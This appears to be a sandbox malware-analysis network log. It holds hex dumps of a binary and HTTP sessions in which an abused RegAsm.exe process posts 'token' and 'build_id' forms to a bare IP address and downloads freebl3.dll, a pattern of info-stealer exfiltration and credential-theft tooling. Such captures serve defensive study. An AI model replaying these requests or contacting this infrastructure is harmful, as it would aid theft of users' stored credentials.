                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                  Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                  Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                  Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.44973895.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:02 UTC326OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 4677
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:02 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDAFIIDAKJDGDHIDAKJJCont
                                                                                  2024-05-15 18:36:03 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.44973995.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:03 UTC326OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 1529
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:03 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GDAAKFIDGIEGDGDHIDAKCont
                                                                                  2024-05-15 18:36:04 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.44974095.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:04 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:04 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CBFIJEGIDBGIECAKKEGDCont
                                                                                  2024-05-15 18:36:05 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.44974195.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:06 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CFHCGHJDBFIIDGDHIJDBCont
                                                                                  2024-05-15 18:36:07 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.44974295.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:07 UTC220OUTGET /freebl3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:08 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:07 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 685392
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-a7550"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-15 18:36:08 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                  Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                  Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                  Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                  Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                  Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                  Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
